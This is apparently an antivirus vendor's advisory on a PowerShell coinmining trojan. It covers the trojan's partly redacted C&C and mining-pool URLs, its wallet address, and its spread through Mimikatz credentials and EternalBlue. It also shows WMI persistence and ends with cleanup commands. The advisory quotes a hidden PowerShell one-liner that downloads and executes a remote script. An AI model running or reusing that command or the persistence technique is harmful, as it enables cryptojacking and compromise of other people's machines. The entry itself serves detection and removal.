TROJ_POWLOAD.COINM
Trojan.PowerShell.Agent.N (Bitdefender)
Windows
Threat Type: Trojan
Destructiveness: No
Encrypted: Yes
In the wild: Yes
OVERVIEW
Downloaded from the Internet, Dropped by other malware
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It connects to certain URLs. It may do this to remotely inform a malicious user of its installation. It may also do this to download possibly malicious files onto the computer, which puts the computer at a greater risk of infection by other threats.
TECHNICAL DETAILS
3,766,940 bytes
PS1
Yes
11 Dec 2017
Connects to URLs/IPs, Deletes files
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Download Routine
This Trojan connects to the following malicious URLs:
- http://{BLOCKED}7.{BLOCKED}9.67.243:8000
- http://{BLOCKED}2.{BLOCKED}7.116.8:8000
- http://{BLOCKED}8.{BLOCKED}4.48.95:8000
NOTES:
If affected machine is 64-bit, it downloads and executes the following in the accessed C&C:
- http://{C&C Address}/in6.ps1
- Office_Updater
It performs coinmining by connecting to the following coinmining pool with the following arguments:
- -o {URL of mining server} -u {username for mining server} -p {password for mining server}
{username for mining server} = 49WZduVQ1DFWG3scZxFT8hBY1JsoYuJVqMRe8UAiYzc2WmGbN7yFDmmc2GZzrAv6GkY24hR7imhNaWME9wEKWPGF3h2FXQB
{password for mining server} = x
{URL of mining server} =
- stratum+tcp://{BLOCKED}1.{BLOCKED}ol.org:14444
- stratum+tcp://{BLOCKED}2.{BLOCKED}ol.org:14444
- stratum+tcp://{BLOCKED}-east1.{BLOCKED}ol.org:14444
- stratum+tcp://{BLOCKED}-west1.{BLOCKED}ol.org:14444
- stratum+tcp://{BLOCKED}ia1.{BLOCKED}ol.org:14444
- stratum+tcp://{BLOCKED}e.{BLOCKED}pool.com:80
- stratum+tcp://{BLOCKED}e.{BLOCKED}l.net:80
It scans for network connections in the affected machines.
It checks if scanned network connection can be accessed by gathered user credentials. If the connection is successful, it will execute a PowerShell command using the following URL:
- http://{BLOCKED}7.{BLOCKED}9.67.243:8000/in6.ps1 - If scanned network connection uses 64-bit operating system
- http://{BLOCKED}2.{BLOCKED}7.116.8:8000/in6.ps1 - If scanned network connection uses 64-bit operating system
- http://{BLOCKED}8.{BLOCKED4.48.95:8000/in6.ps1 - If scanned network connection uses 64-bit operating system
- http://{BLOCKED}7.{BLOCKED}9.67.243:8000/in3.ps1 - If scanned network connection uses 32-bit operating system
- http://{BLOCKED}2.{BLOCKED}7.116.8:8000/in3.ps1 - If scanned network connection uses 32-bit operating system
- http://{BLOCKED}8.{BLOCKED}4.48.95:8000/in3.ps1 - If scanned network connection uses 32-bit operating system
If network connection cannot be accessed using Mimikatz generated credentials, it will attempt to perform EternalBlue exploit in the scanned network connections.
Once exploit attempt is successful, the following command prompt will be executed on the vulnerable machine via shell code:
- cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Logs')))) {IEX(New-Object Net.WebClient).DownloadString('http://{BLOCKED}7.{BLOCKED}9.67.243:8000/ma3.ps1 ')}" - For 32-bit operating systems
- cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Logs')))) {IEX(New-Object Net.WebClient).DownloadString('http://{BLOCKED}7.{BLOCKED}9.67.243:8000/ma6.ps1 ')}" - For 64-bit operating systems
It creates the following WMI Class to enable its automatic execution:
- CommandLineEventConsumer
- __EventFilter
- __FilterToConsumerBinding
- powershell.exe -NoP -NonI -W Hidden -E {encoded script}
- yastcat
- %User Temp%\y1.bat
- Standby timeout to 0 minutes
- Hibernate timeout to 0 minutes
- Set lid close action/pushing power button to do nothing
SOLUTION
9.850
13.836.07
11 Dec 2017
13.837.00
12 Dec 2017
Step 1
Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.
Step 2
Scan your computer with your Trend Micro product to delete files detected as TROJ_POWLOAD.COINM. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:
NOTES:
Restore power configuration in Control Panel according to user preference.
Execute the following in command prompt to remove the created WMI instances:
- powershell.exe Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter Name= 'SCM Event Logs Filter' | remove-WMIObject
- powershell.exe Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter Name='SCM Event Logs Consumer' | remove-WMIObject
- powershell.exe Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter __Path LIKE '%SCM Event Logs Consumer%' | remove-WMIObject
- powershell.exe ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject
Did this description help? Tell us how we did.